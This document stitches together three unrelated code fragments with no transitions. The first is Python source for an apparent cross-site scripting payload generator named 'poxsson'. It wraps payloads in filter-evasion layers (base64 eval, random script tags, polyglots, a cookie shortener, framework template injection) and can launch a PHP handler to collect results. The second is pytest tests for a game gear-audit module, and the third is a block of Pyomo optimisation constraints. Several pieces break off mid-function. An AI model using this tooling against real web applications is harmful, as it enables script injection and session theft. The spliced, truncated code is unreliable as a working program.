print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ "))
print(green("{_______ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ {__ {__{__ {__ {__ {__ {__ {__"))
print(green("{__ {__ {__ {__ {__ __ {__ __ {__ {___ {__ "))
print("")
#Function for printing metasploit-like tables ;>
def print_table(table_data):
styles = []
for title in table_data[0]:
msf_style = "-"*len(title)
styles.append(msf_style)
table_data.insert(1, styles)
table_instance = SingleTable(table_data)
table_instance.inner_heading_row_border = False
table_instance.inner_row_border = False
table_instance.inner_column_border = False
table_instance.outer_border = False
table_instance.justify_columns = {0: 'left', 1: 'left', 2: 'left'}
print(table_instance.table)
print('')
#Simply lists files under /payloads dir and prints info about them in color
def list_payloads():
#print(f"\n{logs.red(logs.bold("|"))} PAYLOADS {logs.red(logs.bold("|"))}")
table_data = [["Name", "Description", "Handler", "Length"]]
payloads = []
plds = []
for p in os.walk(POXSSON_PATH+'payloads'):
payloads.append(p)
payloads = payloads[0][2]
for p in payloads:
if ('init' in p or '.pyc' in p):
pass #We don't want temporary files to interfere
else:
if ('.py' in p and not '.pyc' in p):
plds.append(importlib.import_module("payloads."+p.replace(".py", ''))) #Each payload is imported and treated as a module
for pl in plds:
try:
handler = pl.handler
handler = True
except:
handler = False
table_data.append([red(pl.name), blue(pl.description), handler, len(pl.payload)])
print(info(f"Available payloads: {len(plds)}"))
print("")
print_table(table_data)
print("")
polyglot_triggers.insert(0, ["Name", "Compatibility", "Description"]) #insert() mutates in place and returns None
print(info(f"Available triggers: {len(polyglot_triggers) - 1}")) #exclude the header row just inserted
print("")
print_table(polyglot_triggers)
print("")
print(good(f"Available polyglots: {len(polyglots)}"))
for idn in polyglots:
print(f"[{idn}] -> {polyglots[idn].replace('PAYLOAD', red('PAYLOAD')).replace('TRIGGER', green('TRIGGER'))}")
print("")
#Shows info (options, description, size...) about payload selected with "--payload" flag
def print_payload_info(payload_mod):
payload_options_table_data = [['NAME', 'VALUE', 'DESCRIPTION']] #headers match the [option, value, description] append order below
handler_options_table_data = [['NAME', 'VALUE', 'DESCRIPTION']]
try:
handler = payload_mod.handler
handler = True
except:
handler = False
try:
for opt in payload_mod.options: #Extracts the fields of the multi-dimensional .options list
option = opt[0]
value = opt[1]
description = opt[2]
payload_options_table_data.append([option, value, description])
except:
pass
try:
for opt in payload_mod.handler_options:
option = opt[0]
value = opt[1]
description = opt[2]
handler_options_table_data.append([option, value, description])
except:
pass
#Prints all obtained data with f"" prefix formatting
print(info(f"Name: {payload_mod.name}"))
print(info(f"Description: {payload_mod.description}"))
print(info(f"Length: {len(payload_mod.payload)} bytes"))
print(info(f"Handler: {handler}"))
if len(payload_options_table_data) > 1:
print("")
print(info("Payload options:")) #huepy's info() returns a formatted string, it does not print
print("")
print_table(payload_options_table_data)
if len(handler_options_table_data) > 1:
print("")
print(info("Handler options:"))
print("")
print_table(handler_options_table_data)
#def test_payload(payload_name):
# pass
#I was so high writing this function lol
#But I suppose it just copies a PHP handler to a directory (?)
#And launches it from there using PHP inline interpreter
def start_php_handler(php_code):
#subprocess.call(f"touch {POXSSON_PATH}php_handler_dir/handler.php", shell=True)
with open(f"{POXSSON_PATH}php_handler_dir/handler.php", "w+") as handler_file:
handler_file.write(php_code) #the context manager closes the file on exit
subprocess.call(f"php -t {POXSSON_PATH}php_handler_dir -S {local_ip()}:8000", shell=True)
subprocess.call(f"rm -rf {POXSSON_PATH}php_handler_dir", shell=True)
#Inserts default options, and also options passed as NAME=VAL in command line
def insert_options(payload_code, payload_options, cli_options):
pc = payload_code
for option in cli_options:
name = option.split("=")[0].upper()
value = option.split("=")[1]
pc = pc.replace(name.upper(), value)
for option in payload_options:
name = option[0]
value = option[2]
if (value == "" and "=" in ''.join(cli_options)):
print(info(f"{name.upper()} option is empty")) #Warns if you forgot to set something
#if name.upper() not in payload_code:
#logs.err("No such option")
#sys.exit()
if name.lower() not in ''.join(cli_options):
pc = pc.replace(name.upper(), value)
#try:
#except:
return pc
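insert_options() gives CLI NAME=VAL pairs precedence over a payload's defaults. The same precedence rule in a condensed, standalone sketch (substitute, and the URL/MSG option names, are illustrative, not the tool's API):

```python
def substitute(template, defaults, cli_options):
    """CLI 'name=value' pairs win; remaining placeholders fall back to defaults."""
    overridden = set()
    for opt in cli_options:
        name, _, value = opt.partition("=")
        template = template.replace(name.upper(), value)
        overridden.add(name.upper())
    for name, value in defaults.items():
        if name not in overridden:
            template = template.replace(name, value)
    return template

out = substitute("fetch('URL?m=MSG')",
                 {"URL": "http://default", "MSG": "hi"},
                 ["url=http://evil"])
assert out == "fetch('http://evil?m=hi')"
```

Tracking which names were overridden avoids re-replacing a placeholder that the CLI already filled, which is the same guard insert_options() implements with its `name.lower() not in ''.join(cli_options)` check.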
def arguments():
parser = argparse.ArgumentParser(prog="poxsson")
wrapping = parser.add_argument_group()
#wrapping_group = wrapping.add_mutually_exclusive_group()
parser.add_argument('OPTIONS', nargs="*", help="Specify the payload's options") #nargs="*" means 0 or more arguments of this type can be passed
parser.add_argument('-l', '--list', action='store_true', dest='LIST_PAYLOADS', help='List available payloads')
parser.add_argument('-p', '--payload', action='store', dest='PAYLOAD', metavar='<payload>', help='Specify the payload')
parser.add_argument('-v', '--verbose', action='store_true', dest='VERBOSE', help='Increase verbosity')
parser.add_argument('-i', '--info', action='store_true', dest='INFO', help='Show payload info')
parser.add_argument('-n', '--null', action='store_true', dest='NULL_INSERT', help='Perform null ("%%00") insertion for evasion')
parser.add_argument('-c', '--clip', action='store_true', dest='CLIP', help='Copy payload to clipboard')
parser.add_argument('-o', '--output', action='store', dest='OUTPUT', metavar='<file>', help='Save payload to a file')
parser.add_argument('-d', '--delay', action='store', dest='DELAY', metavar='<n[s|m|h]>', help='Execute payload after specific period of time (seconds, minutes, hours)')
parser.add_argument('-e', '--encode', action='store', choices=['base64', 'utf8'], dest='ENCODE', metavar='<encoding>', help='Encode payload')
parser.add_argument('-s', '--separator', action='store', choices=['slash', 'newline', 'tab', 'carriage', 'random'], dest='SEPARATOR', metavar='<sep>', help="Use specific (or random) separator between tag and first parameter")
#Separate group for executable wrappers (it just looks more clear imho)
wrapping.add_argument('--random-max', action='store', dest='RANDOM_MAX', help="Maximum length of the random payload")
wrapping.add_argument('--tag', action='store_true', dest='TAG', help="Wrap payload with basic <script> tags")
wrapping.add_argument('--tag-random', action='store_true', dest='TAG_RANDOM', help="Wrap payload with random <script> tags")
wrapping.add_argument('--tag-different', action='store_true', dest='TAG_RANDOM_DIFFERENT', help="When combined with above option, generates different start and end tags")
wrapping.add_argument('--tag-closer', action='store_true', dest='TAG_CLOSER', help="Use '//' instead of '>' for closing tags")
wrapping.add_argument('--polyglot', action='store', dest='POLYGLOT', metavar="<id>", help="Wrap payload with selected or random polyglot wrapper")
wrapping.add_argument('--polyglot-trigger', action='store', dest='POLYGLOT_TRIGGER', help="Wrap payload with polyglot wrapper")
wrapping.add_argument('--cookie', action='store_true', dest='COOKIE', help="Use cookie shortener to reduce payload's size and detection probability")
wrapping.add_argument('--confirm', action='store_true', dest='CONFIRM', help="Replace alert() popups with less detectable confirm()")
wrapping.add_argument('--oneliner', action='store_true', dest='ONELINER', help="Convert generated payload to one-liner")
wrapping.add_argument('--bookmarklet', action='store_true', dest='BOOKMARKLET', help="Convert generated payload to a bookmarklet")
wrapping.add_argument('--handler', action='store_true', dest='HANDLER', help="Start handler after payload generation")
wrapping.add_argument('--replace-http', action='store_true', dest='REPLACE_HTTP', help="Replace 'http[s]://' with a random substitute")
wrapping.add_argument('--jquery', action='store_true', dest='JQUERY', help="Load JQuery before running the payload")
wrapping.add_argument('--v2', action='store_true', dest='VUE_2', help="Embed payload inside VueJS v2 template source")
wrapping.add_argument('--v3', action='store_true', dest='VUE_3', help="Embed payload inside VueJS v3 template source")
wrapping.add_argument('--angular', action='store_true', dest='ANGULAR', help="Embed payload inside AngularJS template source")
#parser.add_argument('--replacei-chars', action='store', choices=['html', 'octal', 'url', 'iso', 'hex', 'numeric'], dest='REPLACE',
# help="Replace all special characters with their equivalents of selected type")
return parser.parse_args()
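main() expands the --delay value (a number plus an s/m/h suffix) into milliseconds for setTimeout. The conversion in isolation (delay_to_ms is an illustrative name):

```python
def delay_to_ms(spec):
    """'10s' -> 10000, '5m' -> 300000, '2h' -> 7200000; rejects bad suffixes."""
    units = {'s': 1000, 'm': 60000, 'h': 3600000}
    if spec[-1] not in units:
        raise ValueError("Wrong delay format")
    return int(spec[:-1]) * units[spec[-1]]

assert delay_to_ms("10s") == 10000
assert delay_to_ms("5m") == 300000
```

setTimeout takes milliseconds, so the human-friendly suffix has to be expanded before the payload is wrapped.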
def main():
res = arguments()
if res.LIST_PAYLOADS:
list_payloads()
sys.exit()
try:
loaded_payload = importlib.import_module(f"payloads.{res.PAYLOAD}") #We try to load our specified payload here
except ImportError:
print(bad("No such payload"))
sys.exit()
js_code = loaded_payload.payload
if res.RANDOM_MAX:
if res.PAYLOAD == "random":
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_payloads.txt", "r+").readlines())
js_code = selected_payload.strip() #without this the randomly chosen payload was never used
if res.PAYLOAD == "confirm":
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
while len(selected_payload) >= int(res.RANDOM_MAX):
selected_payload = random.choice(open("random_confirm_payloads.txt", "r+").readlines())
js_code = selected_payload.strip()
js_code = insert_options(js_code, loaded_payload.options, res.OPTIONS) #Options replacement
if res.DELAY:
time_shorts = {'s':1000, 'm':60000, 'h':3600000}
if type(res.DELAY) == int:
delay_in_miliseconds = int(res.DELAY)
else:
if res.DELAY[-1] not in ['s', 'm', 'h']:
print(bad("Wrong delay format")) #huepy provides bad(); err() is undefined
sys.exit()
delay_in_miliseconds = int(res.DELAY[0:-1])*time_shorts[res.DELAY[-1]]
js_code = f"""setTimeout(function() {{
{js_code}
}}, {delay_in_miliseconds})""" #Literal braces must be doubled inside an f-string. The payload is embedded inside "setTimeout"; the interval is expanded to milliseconds
if res.JQUERY:
js_code = f"""<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js">{js_code}"""
if res.INFO:
print_payload_info(loaded_payload)
sys.exit() #Shows details and exits
if res.ONELINER:
js_code = js_code.replace("\n", "") #Replaces newlines so the payload becomes a one-liner
if res.BOOKMARKLET:
js_code = "javascript:(function(){" + js_code.replace("\n", "") + "})();"
if res.NULL_INSERT:
null_char = "%00" #in a plain string "%%" would be two literal percent signs
payload_len = len(js_code)
start_position = random.randrange(payload_len)
#Not finished yet, but it should insert NULLs on random positions.
if res.REPLACE_HTTP:
substitute = random.choice(["//", "/\\\\", "\\\\"])
js_code = js_code.replace("http://", substitute) #Sometimes http[s] can be omitted in payloads
js_code = js_code.replace("https://", substitute)
if res.ENCODE:
if res.ENCODE == "base64":
js_code = f"""eval(atob('{base64.b64encode(js_code.encode("utf-8")).decode()}'))""" #atob() is the browser's base64 decoder; .decode() avoids embedding a b'...' literal
elif res.ENCODE == "utf8":
js_code = js_code.encode("utf-8") #Payload encoders
else:
print(bad("No such encoding"))
sys.exit()
if res.POLYGLOT: #Polyglot wrapper makes it easy to exec payload in multiple environments
if res.POLYGLOT == "random":
plg = random.choice(list(polyglots.values()))
else:
plg = polyglots[res.POLYGLOT]
polyglot = plg.replace("PAYLOAD", js_code).replace("TRIGGER", res.POLYGLOT_TRIGGER)
js_code = polyglot
if res.TAG:
js_code_non_tagged = js_code
js_code = f"<script>{js_code}</script>"
if res.COOKIE:
js_code = js_code.replace("document.cookie", "cookie")
js_code_non_tagged = js_code
if res.SEPARATOR:
separators = {
"slash" : "/",
"newline" : "\n",
"tab" : "\t",
"carriage" : "\r"
}
def select_separator():
if res.SEPARATOR == "random":
return random.choice(list(separators.values()))
else:
return separators[res.SEPARATOR]
src = bs(js_code, "html.parser") #BeautifulSoup parses the payload so each tag name can be rewritten
for tag in src.find_all():
js_code = js_code.replace(tag.name, tag.name+select_separator())
js_code_non_tagged = js_code
if res.TAG_RANDOM: #Wraps payload with random <script> tags
"""Unit Test for Audit Info"""
import pytest
from unittest.mock import patch
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from altaudit.models import Base, Character, Gem
from altaudit.gem_enchant import gem_lookup
import altaudit.sections.audit as Section
@pytest.fixture
def mock_is_off_hand_weapon(mocker):
return mocker.patch('altaudit.sections.audit.is_off_hand_weapon')
@pytest.fixture
def mock_is_primary_slot(mocker):
mock = mocker.patch('altaudit.sections.audit.is_primary_enchant_slot')
mock.return_value = False
return mock
@pytest.fixture(scope='module')
def db():
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(engine)()
session.add_all([Gem(k, v['quality'], v['name'], v['icon'], v['stat'])
for k,v in gem_lookup.items()])
session.commit()
session.close()
yield engine
Base.metadata.drop_all(engine)
@pytest.fixture
def db_session(db):
session = sessionmaker(db)()
yield session
session.close()
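The two fixtures above pair a module-scoped in-memory engine (seeded once with the Gem rows) with a per-test session that is closed after each test. The same setup/teardown shape, sketched with the stdlib sqlite3 module so it is self-contained (the table and row are illustrative):

```python
import sqlite3

# Module-scoped "engine": one shared in-memory database, seeded once.
conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE gem (id INTEGER PRIMARY KEY, name TEXT)')
conn.execute("INSERT INTO gem VALUES (173121, 'Deadly Jewel Doublet')")

# Per-test "session": each test reads the shared seed data...
name = conn.execute('SELECT name FROM gem WHERE id = 173121').fetchone()[0]
assert name == 'Deadly Jewel Doublet'

# ...and teardown drops everything, mirroring Base.metadata.drop_all.
conn.close()
```

Seeding once per module keeps the lookup-table inserts out of every test while the per-test session still isolates each test's ORM state.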
def test_audit_regular_item(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 6166,
'source_item' : { 'name' : 'Enchant Ring - Tenet of Haste' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 6166
assert jack.finger_1_enchant_quality == 3
assert jack.finger_1_enchant_name == 'Tenet of Haste'
assert jack.finger_1_enchant_description == '+16 Haste'
def test_audit_item_missing(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : []}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 0
assert jack.finger_1_enchant_name == 'None'
assert jack.finger_1_enchant_description == None
def test_audit_item_no_enchant(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' }}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 0
assert jack.finger_1_enchant_name == 'None'
assert jack.finger_1_enchant_description == None
def test_audit_item_enchant_not_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 3000,
'source_item' : { 'name' : 'Enchant Ring - Total Garbage' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 3000
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == 'Total Garbage'
assert jack.finger_1_enchant_description == None
def test_audit_item_enchant_offhand_missing_not_weapon(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : []}}
mock_is_off_hand_weapon.return_value = False
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == None
assert jack.off_hand_enchant_quality == None
assert jack.off_hand_enchant_name == None
assert jack.off_hand_enchant_description == None
def test_audit_item_enchant_offhand_not_enchantable(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'HOLDABLE' }}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == None
assert jack.off_hand_enchant_quality == None
assert jack.off_hand_enchant_name == None
assert jack.off_hand_enchant_description == None
def test_audit_item_enchant_weapon_offhand_is_enchanted(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'WEAPON' },
'enchantments' : [{
'enchantment_id' : 6223,
'source_item' : { 'name' : 'Enchant Weapon - Lightless Force' }}]}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == 6223
assert jack.off_hand_enchant_quality == 3
assert jack.off_hand_enchant_name == 'Lightless Force'
assert jack.off_hand_enchant_description == "Chance to send out a wave of Shadow energy, striking 5 enemies"
def test_audit_item_enchant_two_handed_offhand_is_enchanted(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'OFF_HAND' },
'inventory_type' : { 'type' : 'TWOHWEAPON' },
'enchantments' : [{
'enchantment_id' : 6223,
'source_item' : { 'name' : 'Enchant Weapon - Lightless Force' }}]}]}}
Section.audit(jack, response, None)
assert jack.off_hand_enchant_id == 6223
assert jack.off_hand_enchant_quality == 3
assert jack.off_hand_enchant_name == 'Lightless Force'
assert jack.off_hand_enchant_description == "Chance to send out a wave of Shadow energy, striking 5 enemies"
def test_audit_empty_sockets(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [
{ 'slot' : { 'type' : 'SHOULDER' }},
{ 'slot' : { 'type' : 'CHEST' }},
{ 'slot' : { 'type' : 'WAIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'WRIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_1' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_2' }, 'sockets' : [{}]}]}}
Section.audit(jack, response, None)
assert jack.empty_sockets == 4
assert jack.empty_socket_slots == 'waist|wrist|finger_1|finger_2'
def test_audit_enchant_dk_rune(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'MAIN_HAND' },
'enchantments' : [{
'enchantment_id' : 3368,
'display_string' : 'Enchanted: Rune of the Fallen Crusader'}]}]}}
Section.audit(jack, response, None)
assert jack.main_hand_enchant_id == 3368
assert jack.main_hand_enchant_quality == 4
assert jack.main_hand_enchant_name == 'Rune of the Fallen Crusader'
assert jack.main_hand_enchant_description == "Chance to heal for 6% and increases total Strength by 15% for 15 sec."
def test_audit_gem_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Jewel Doublet',
'id' : 173121},
'display_string' : '+12 Critical Strike'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 173121
assert jack.gems[0].gem.quality == 2
assert jack.gems[0].gem.name == 'Deadly Jewel Doublet'
assert jack.gems[0].gem.icon == 'inv_jewelcrafting_90_cutuncommon_orange'
assert jack.gems[0].gem.stat == '+12 Critical Strike'
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_missing_id(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Jewel Doublet'},
'display_string' : '+12 Critical Strike'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems == []
def test_audit_gem_missing_name_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'id' : 12390},
'display_string' : '+20 Bullshit'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Unknown'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == '+20 Bullshit'
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_missing_display_string_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Stone',
'id' : 12390}}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Deadly Stone'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == "Unknown"
assert jack.gems[0].slot == 'finger_1'
def test_audit_gem_not_in_db(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'sockets' : [{
'item' : {
'name' : 'Deadly Stone',
'id' : 12390},
'display_string' : '+20 Bullshit'}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems[0].gem.id == 12390
assert jack.gems[0].gem.quality == 1
assert jack.gems[0].gem.name == 'Deadly Stone'
assert jack.gems[0].gem.icon == None
assert jack.gems[0].gem.stat == '+20 Bullshit'
assert jack.gems[0].slot == 'finger_1'
def test_audit_no_gems(db_session, mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [
{ 'slot' : { 'type' : 'SHOULDER' }},
{ 'slot' : { 'type' : 'CHEST' }},
{ 'slot' : { 'type' : 'WAIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'WRIST' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_1' }, 'sockets' : [{}]},
{ 'slot' : { 'type' : 'FINGER_2' }, 'sockets' : [{}]}]}}
Section.audit(jack, response, db_session)
assert jack.gems == []
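The gem tests above all exercise the same fallback behaviour: sockets without an `id` are skipped, while a missing `name` or `display_string` falls back to `'Unknown'`. A minimal stand-alone sketch of that parsing logic — `extract_gems` is a hypothetical helper for illustration, not the real `Section.audit` implementation:

```python
# Hypothetical sketch of socket-gem extraction with the fallbacks the tests
# above check; this is NOT the real Section.audit implementation.
def extract_gems(response):
    gems = []
    items = response.get('equipment', {}).get('equipped_items', [])
    for equipped in items:
        slot = equipped.get('slot', {}).get('type', '').lower()
        for socket in equipped.get('sockets', []):
            item = socket.get('item')
            if not item or 'id' not in item:
                continue  # gems without an id are skipped entirely
            gems.append({
                'id': item['id'],
                'name': item.get('name', 'Unknown'),
                'stat': socket.get('display_string', 'Unknown'),
                'slot': slot,
            })
    return gems
```

The `dict.get` chains mean an item with no `sockets` key, or an empty socket dict, contributes nothing, matching the `jack.gems == []` assertions.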
def test_audit_missing_enchant_id(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'source_item' : { 'name' : 'Enchant Ring - Accord of Haste' }}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == None
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == "Accord of Haste"
assert jack.finger_1_enchant_description == None
def test_audit_missing_enchant_source_item_and_display_string_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 6166}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 6166
assert jack.finger_1_enchant_quality == 3
assert jack.finger_1_enchant_name == "Tenet of Haste"
assert jack.finger_1_enchant_description == '+16 Haste'
def test_audit_missing_enchant_source_item_and_display_string_not_in_lookup(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'FINGER_1' },
'enchantments' : [{
'enchantment_id' : 3000}]}]}}
Section.audit(jack, response, None)
assert jack.finger_1_enchant_id == 3000
assert jack.finger_1_enchant_quality == 1
assert jack.finger_1_enchant_name == "Unknown"
assert jack.finger_1_enchant_description == None
def test_audit_primary_wrists(mock_is_off_hand_weapon, mock_is_primary_slot):
jack = Character('jack')
response = { 'equipment' : {
'equipped_items' : [{
'slot' : { 'type' : 'WRIST' },
'enchantments' : [{
'enchantment_id' : 6220,
'source_item' : { 'name' : 'Enchant Bracers - Eternal Intellect' }}]}]}}
mock_is_primary_slot.return_value = True
Section.audit(jack, response, None)
assert jack.primary_enchant_id == 6220
assert jack.primary_enchant_quality == 3
assert jack.primary_enchant_name == "Eternal Intellect"
assert jack.primary_enchant_description == '+15 Intellect'
def test_audit_primary_wrists_but_wearing_unrelated(mock_is_off_hand_weapon, mock_is_primary_slot):
def _is_primary_slot(profile, slot):
if slot == 'wrist':
return True
else:
return False
jack = Character('jack')
response = { 'equipment' : {
m.x1047 + m.x1098 + m.x1147 + m.x1236 + m.x1287 + m.x1329 + m.x1371
+ m.x1413 + m.x1455 + m.x1495 + m.x1534 + m.x1567 + m.x1601 == 1)
m.c1901 = Constraint(expr= m.x92 + m.x275 + m.x365 + m.x478 + m.x533 + m.x595 + m.x670 + m.x721 + m.x815 + m.x840
+ m.x883 + m.x937 + m.x976 + m.x1099 + m.x1148 + m.x1237 + m.x1288 + m.x1330 + m.x1372
+ m.x1414 + m.x1456 + m.x1496 + m.x1535 + m.x1568 + m.x1602 == 1)
m.c1902 = Constraint(expr= m.x72 + m.x201 + m.x248 + m.x276 + m.x366 + m.x380 + m.x410 + m.x479 + m.x534 + m.x596
+ m.x671 + m.x722 + m.x772 + m.x816 + m.x841 + m.x884 + m.x938 + m.x977 + m.x1100 + m.x1149
+ m.x1238 + m.x1289 + m.x1331 + m.x1373 + m.x1415 + m.x1457 + m.x1497 + m.x1536 + m.x1569
+ m.x1603 == 1)
m.c1903 = Constraint(expr= m.x93 + m.x277 + m.x367 + m.x381 + m.x425 + m.x439 + m.x480 + m.x535 + m.x597 + m.x672
+ m.x723 + m.x773 + m.x817 + m.x842 + m.x885 + m.x939 + m.x978 + m.x1048 + m.x1101 + m.x1150
+ m.x1239 + m.x1290 + m.x1332 + m.x1374 + m.x1416 + m.x1458 + m.x1498 + m.x1537 + m.x1570
+ m.x1604 == 1)
m.c1904 = Constraint(expr= m.x73 + m.x94 + m.x202 + m.x368 + m.x382 + m.x440 + m.x481 + m.x536 + m.x673 + m.x724
+ m.x774 + m.x818 + m.x843 + m.x886 + m.x940 + m.x979 + m.x1102 + m.x1151 + m.x1240 + m.x1291
+ m.x1333 + m.x1375 + m.x1417 + m.x1459 + m.x1499 + m.x1538 + m.x1571 + m.x1605 == 1)
m.c1905 = Constraint(expr= m.x55 + m.x95 + m.x116 + m.x278 + m.x453 + m.x482 + m.x537 + m.x598 + m.x674 + m.x725
+ m.x775 + m.x819 + m.x844 + m.x887 + m.x941 + m.x980 + m.x1103 + m.x1152 + m.x1292 + m.x1334
+ m.x1376 + m.x1418 + m.x1460 + m.x1500 + m.x1539 + m.x1572 + m.x1606 == 1)
m.c1906 = Constraint(expr= m.x74 + m.x96 + m.x203 + m.x249 + m.x279 + m.x335 + m.x383 + m.x483 + m.x538 + m.x599
+ m.x635 + m.x675 + m.x726 + m.x776 + m.x820 + m.x845 + m.x888 + m.x942 + m.x981 + m.x1104
+ m.x1153 + m.x1241 + m.x1293 + m.x1335 + m.x1377 + m.x1419 + m.x1461 + m.x1501 + m.x1540
+ m.x1573 + m.x1607 == 1)
m.c1907 = Constraint(expr= m.x117 + m.x144 + m.x204 + m.x250 + m.x280 + m.x336 + m.x384 + m.x484 + m.x539 + m.x579
+ m.x600 + m.x636 + m.x676 + m.x727 + m.x777 + m.x821 + m.x846 + m.x889 + m.x943 + m.x982
+ m.x1049 + m.x1105 + m.x1154 + m.x1242 + m.x1294 + m.x1336 + m.x1378 + m.x1420 + m.x1462
+ m.x1502 + m.x1541 + m.x1574 + m.x1608 == 1)
m.c1908 = Constraint(expr= m.x281 + m.x385 + m.x485 + m.x540 + m.x601 + m.x677 + m.x728 + m.x778 + m.x822 + m.x890
+ m.x944 + m.x983 + m.x1050 + m.x1067 + m.x1106 + m.x1155 + m.x1243 + m.x1295 + m.x1337
+ m.x1379 + m.x1421 + m.x1463 + m.x1503 + m.x1542 + m.x1575 + m.x1609 == 1)
m.c1909 = Constraint(expr= m.x486 + m.x541 + m.x602 + m.x678 + m.x729 + m.x823 + m.x891 + m.x945 + m.x984 + m.x1107
+ m.x1156 + m.x1244 + m.x1296 + m.x1338 + m.x1380 + m.x1422 + m.x1464 + m.x1504 + m.x1543
+ m.x1610 == 1)
m.c1910 = Constraint(expr= m.x49 + m.x205 + m.x282 + m.x337 + m.x487 + m.x542 + m.x603 + m.x637 + m.x679 + m.x730
+ m.x779 + m.x824 + m.x847 + m.x864 + m.x892 + m.x946 + m.x985 + m.x1108 + m.x1157 + m.x1245
+ m.x1297 + m.x1339 + m.x1381 + m.x1423 + m.x1465 + m.x1505 + m.x1544 + m.x1611 == 1)
m.c1911 = Constraint(expr= m.x206 + m.x283 + m.x308 + m.x338 + m.x386 + m.x488 + m.x543 + m.x604 + m.x638 + m.x680
